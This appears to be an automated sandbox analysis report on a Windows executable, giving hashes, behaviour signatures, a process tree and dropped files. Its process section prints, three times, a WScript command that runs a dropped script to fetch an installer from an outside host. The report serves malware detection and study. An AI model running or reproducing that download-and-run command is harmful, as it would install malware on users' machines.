Analysis

  • max time kernel
    145s
  • max time network
    179s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04-12-2022 13:56

General

  • Target

    af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe

  • Size

    184KB

  • MD5

    15036d06dd5d6e4514c9c04b9430539f

  • SHA1

    99790d740a8b8648ca7ac312855693709f2293e8

  • SHA256

    af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2

  • SHA512

    ca3c3b2171d5bcf4a4a3cb92f0aa1f338e4da6d03602b1c2c5db2bb8c8a1acf5d6349bf2cf72e312c40d9325661fc2e33fd2b25577d41ffc470824a5c40212ec

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3sJ:/7BSH8zUB+nGESaaRvoB7FJNndnp

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe
    "C:\Users\Admin\AppData\Local\Temp\af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:964
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
      2⤵
      • Blocklisted process makes network request
      PID:576
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
      2⤵
      • Blocklisted process makes network request
      PID:1032

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

    Filesize

    1KB

    MD5

    a4feaf11ab2269212883b999a17c7231

    SHA1

    73c157251f256fb9764366c49afd47fb55f466e1

    SHA256

    70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

    SHA512

    93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

    Filesize

    280B

    MD5

    986eda6a044d40b54bc41dfac0bfed2b

    SHA1

    d7928d9714ff509a0ba1f101be7307b01b785867

    SHA256

    ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

    SHA512

    b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

    Filesize

    438B

    MD5

    419af552b78f80bdf667bd19f98c0045

    SHA1

    32e18166c2a29a34c88a6ed952ed6b39e211cfad

    SHA256

    03bfa55eaa74437a357a0c95c4399889d771fb9eb29502993480ffca6ff12af0

    SHA512

    0cd2d083ba4ed8a82e2d187acd264dbe21698a0b61cd3d2d4bd7acfe236ff022ef255cc8e17abfaae265b2b783a5a7129a14daac9e30fb55814b5cb46177ea34

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    340B

    MD5

    bf4e496e01e24a403ed7b988a56c1cb3

    SHA1

    94d722e3bebafb7e542e178aeb0e02a4b572310c

    SHA256

    f731137225f720ee77845b9a726632f2c3c0033232cdb6e14b75698667d2abb1

    SHA512

    9aa24849b8dc469d5930df77e7844fed3ed70f9c264013287da4afbcbc7287bce60a17860a1c9708771f82814145c98df1544b1b08e64c654b9212f099037a33

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

    Filesize

    426B

    MD5

    7185358ae2f9b17f8dddbbb4c81b02b6

    SHA1

    ce4bd3ff6cf55988b889b31401a3d2c1d286e204

    SHA256

    851a57422b4e5d43f4071fd2b789e2ba5d45726497d311f309554438a8bd5862

    SHA512

    535c321745d112b8be85736bc49d844f0e16a536da9d6871a6841fd1200e704760d34eb262ebd043b5d8731ce39730e6281531f5f838c2c982ac74497747a1bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BG9XQTG0\domain_profile[1].htm

    Filesize

    7KB

    MD5

    71ce327ca56796df44d415cc8272a82d

    SHA1

    377fba91cc2608f94d9a4ab5a699472aa261d24d

    SHA256

    66f12b95b1a4e51461f9f1f65224143da06888423f5af7c92a8bb524fd4d07df

    SHA512

    17e69c41ac701dd58bbeaa8db0cbd5d4080a6965356c5c4d1403e74e5d235942907a69e8da63a7762f2cacf6f7084905babdbcf90de76ed5c5cdd02b3542cdad

  • C:\Users\Admin\AppData\Local\Temp\fuf4616.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4D8143I1.txt

    Filesize

    175B

    MD5

    b9e917abbd1737873edccc63086e2366

    SHA1

    fbd25074c9fae3d69723c71aff37a311a90eb784

    SHA256

    f568e268e7c11c821045677cef6cab620ebd76536b2fc7bcd7edf2e9a797bb16

    SHA512

    a43d7e55c00296ca13c580e8f35e8c4a5fb151c89e727f7c517ba641661835bb376c879a447f8aa91fa460190dce2725965c2fafb100260fd8a8344ea82bb972

  • memory/904-54-0x0000000075021000-0x0000000075023000-memory.dmp

    Filesize

    8KB